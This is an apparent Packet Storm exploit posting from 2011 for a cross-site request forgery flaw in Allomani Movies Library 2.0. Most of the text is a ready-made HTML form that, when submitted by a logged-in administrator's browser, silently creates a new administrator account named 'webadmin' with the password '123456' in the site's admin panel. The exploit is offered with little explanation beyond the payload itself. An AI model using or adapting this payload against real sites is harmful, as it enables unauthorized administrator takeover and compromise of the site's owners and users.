Allomani Movies Library 2.0 Cross Site Request Forgery

2011-04-02T00:00:00
ID PACKETSTORM:100001
Type packetstorm
Reporter AtT4CKxT3rR0r1ST
Modified 2011-04-02T00:00:00

Description

                                        
                                            `Movies Library 2.0 XSRF Vulnerability (Add Admin)  
====================================================================  
  
####################################################################  
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]  
.:. Script : http://allomani.com/en/movies_script.html  
####################################################################  
  
===[ Exploit ]===  
  
<form method="POST" name="form0" action="http://localhost/Movies Library/admin/index.php">  
<input type="hidden" name="action" value="adduserok"/>  
<input type="hidden" name="hash" value="e10adc3949ba59abbe56e057f20f883e"/>  
<input type="hidden" name="username" value="webadmin"/>  
<input type="hidden" name="password" value="123456"/>  
<input type="hidden" name="email" value="Example@hotmail.com"/>  
<input type="hidden" name="group_id" value="1"/>  
<input type="hidden" name="useraddbutton" value="Add"/>  
</form>  
  
</body>  
</html>  
####################################################################  
  
`